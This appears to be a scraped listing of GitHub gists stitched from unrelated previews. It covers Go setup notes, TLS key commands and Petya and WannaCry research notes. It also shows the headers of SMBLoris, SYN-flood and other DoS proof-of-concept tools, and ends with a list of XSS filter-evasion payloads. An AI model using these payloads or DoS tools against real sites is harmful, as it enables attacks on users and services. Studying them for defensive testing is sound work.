DeadNumbers

Install
Shell exports
Directory explanations
Automatic Imports
Private repo access
Guard (automatic go run)
Godo
Spurious
AWS SDK with Go (inc. some old possibly broken examples)
Build and Compilation

#petya #petrWrap #notPetya

Win32/Diskcoder.Petya.C Ransomware attack.

Got new info? Email at isox@vulners.com or @isox_xx Some wrong info? Leave the comment, we will fix it!

Research list

BI.ZONE

Moved to git repository: https://github.com/denji/golang-tls

Generate private key (.key)

# Key considerations for algorithm "RSA" ≥ 2048-bit
openssl genrsa -out server.key 2048

# Key considerations for algorithm "ECDSA" ≥ secp384r1
# List ECDSA the supported curves (openssl ecparam -list_curves)

WannaCry|WannaDecrypt0r NSA-Cyberweapon-Powered Ransomware Worm

Virus Name: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
Vector: All Windows versions before Windows 10 are vulnerable if not patched for MS-17-010. It uses EternalBlue MS17-010 to propagate.
Ransom: between $300 to $600. There is code to 'rm' (delete) files in the virus. Seems to reset if the virus crashes.
Backdooring: The worm loops through every RDP session on a system to run the ransomware as that user. It also installs the DOUBLEPULSAR backdoor. It corrupts shadow volumes to make recovery harder. (source: malwarebytes)
Kill switch: If the website www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com is up the virus exits instead of infecting the host. (source: malwarebytes). This domain has been sinkholed, stopping the spread of the worm.

SECURITY BULLETIN AND UPDATES HERE: https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

	/* SMBLoris attack proof-of-concept
	*
	* Copyright 2017 Hector Martin "marcan" <marcan@marcan.st>
	*
	* Licensed under the terms of the 2-clause BSD license.
	*
	* This is a proof of concept of a publicly disclosed vulnerability.
	* Please do not go around randomly DoSing people with it.
	*
	* Tips: do not use your local IP as source, or if you do, use iptables to block

	/*
	* targa3 - 1999 (c) Mixter <mixter@newyorkoffice.com>
	*
	* IP stack penetration tool / 'exploit generator'
	* Sends combinations of uncommon IP packets to hosts
	* to generate attacks using invalid fragmentation, protocol,
	* packet size, header values, options, offsets, tcp segments,
	* routing flags, and other unknown/unexpected packet values.
	* Useful for testing IP stacks, routers, firewalls, NIDS,
	* etc. for stability and reactions to unexpected packets.

	/*
	* BANG.C Coded by Sorcerer of DALnet
	*
	* FUCKZ to: etech, blazin, udp, hybrid and kdl
	* PROPZ : skrilla, thanks for all your help with JUNO-Z and especially this code :)
	* --------------------------------
	* REDIRECTION DOS FINALLY DISTRIBUTED !!!!!!
	*
	* This is POC and demonstrates a new method of DoS. The idea
	* behind it is that the attacker generates connection requests

	/*
	Spoofed SYN by eKKiM
	Educational purpose only please.
	Compile with
	gcc syn.c -pthread
	*/
	#include <stdio.h>
	#include <stdlib.h>
	#include <netinet/tcp.h>
	#include <netinet/ip.h>

	// httpget.js: download a file (Windows Script Host)
	// usage: cscript httpget.js <url> <file>

	(function() {
	if (WScript.Arguments.Length != 2) {
	WScript.Echo("Usage: httpget.js <url> <file>")
	WScript.Quit(1)
	}

	var url = WScript.Arguments(0)

	<script\x20type="text/javascript">javascript:alert(1);</script>
	<script\x3Etype="text/javascript">javascript:alert(1);</script>
	<script\x0Dtype="text/javascript">javascript:alert(1);</script>
	<script\x09type="text/javascript">javascript:alert(1);</script>
	<script\x0Ctype="text/javascript">javascript:alert(1);</script>
	<script\x2Ftype="text/javascript">javascript:alert(1);</script>
	<script\x0Atype="text/javascript">javascript:alert(1);</script>
	'`"><\x3Cscript>javascript:alert(1)</script>
	'`"><\x00script>javascript:alert(1)</script>
	<img src=1 href=1 onerror="javascript:alert(1)"></img>